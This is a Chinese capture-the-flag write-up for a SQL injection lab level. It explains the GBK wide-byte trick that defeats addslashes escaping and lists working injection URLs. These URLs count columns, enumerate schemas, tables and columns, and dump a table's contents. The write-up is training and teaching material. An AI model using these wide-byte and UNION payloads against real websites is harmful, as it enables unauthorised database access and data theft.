网络信息安全攻防学习平台|网络信息安全攻防学习平台 注入关第三
防注入分值: 300
小明终于知道,原来黑客如此的吊,还有sql注入这种高端技术,因此他开始学习防注入!
通关地址
老办法,没有信息就看F12呗
html里面有一个tipid=1
ok 知道该怎么做了http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=1
然后尝试来一个单引号 '
界面不行了,啥也没有,说明waf过滤了单引号,
这个时候就要考虑到用宽字节%df绕过
经测试,只要是宽字节都可以比如使用%e0。
ascii码大于127的均为宽子节
【网络信息安全攻防学习平台|网络信息安全攻防学习平台 注入关第三】这里略带一提
该漏洞最早2006年被国外用来讨论数据库字符集设为GBK时,0xbf27本身不是一个有效的GBK字符,但经过addslashes()
转换后变为0xbf5c27,前面的0xbf5c是个有效的GBK字符,所以0xbf5c27会被当作一个字符0xbf5c和一个单引号来处理,结果漏洞就触发了
也就是说:%df\’ = %df%5c%27=縗’,有了单引号就好注入了
我们在输入了
GBK编码,它的编码范围是0x8140~0xFEFE(不包括xx7F),在遇到%df(ascii(223)) >ascii(128)时自动拼接%5c,因此吃掉‘\’,
在这里 %5c就是‘\’
%df在碰到%5c后,会被拼接在一起变成
而%27、%20小于ascii(128)的字符就保留了。
若有些关于unicod,utf-8,gbk,之类的不清楚的可以查一下知乎以及http://www.91ri.org/8611.html
?id=2%df%27%20order%20by%203%23
实际上等于?id=2%df' order by 3#
?id=2%df%27%20order%20by%204%23之后,可以判断出,字段数为3
then
lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=2%df%27%20UNION%20SELECT%201,2,3%23
文章图片
出现了2和3 接下去按着前一篇文章慢慢来
http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=2%bf%27%20union%20select%201,concat(group_concat(distinct+schema_name)),3%20from%20information_schema.schemata%23这个url有点长啊。。。主要用到的是concat(group_concat(distinct+schema_name))
至于每个函数的功能自己查吧
文章图片
然后就是自己翻用这个
concat(group_concat(distinct+table_name))
打开mydbs
别打开test了。。。我已经打开过了。里面啥都没有!!
文章图片
next
http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=2?' union select 1,concat(group_concat(distinct+column_name )),3 from information_schema.columns where table_name=0x7361655F757365725F73716C6934#
文章图片
胜利就在前方!!!
http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=2?' union select 1,concat(group_concat(id,0x3a,title_1,0x3a,content_1)),3 from sae_user_sqli4 #
文章图片
OK了,这两道题的套路都还差不多了,希望大家多熟悉熟悉
推荐阅读
- 得不到的爱情故事
- 网络安全|网络-DNS域名系统详解与DNS攻击
- 信息安全|花样百出的“杀猪盘”走向国际
- 区块链技术指北(ChainONE)社区微信群价值信息汇总第|区块链技术指北(ChainONE)社区微信群价值信息汇总第 47 期
- 神经网络|OpenMV(19OpenMV4 Plus训练神经网络进行口罩识别)
- 在基金第三方代销平台投资安全吗()
- 网络工程师行业发展的三大趋势及两个弊端
- 如何保障移动终端安全(一文详解源自支付宝的全链路安全防护建设)
- 投资|创·问|一亩田邓锦宏:瞄准“卖难”,All in 信息服务
- web安全|[CTF的PASSBY]浅谈FLASK-jinja2 SSTI 的绕过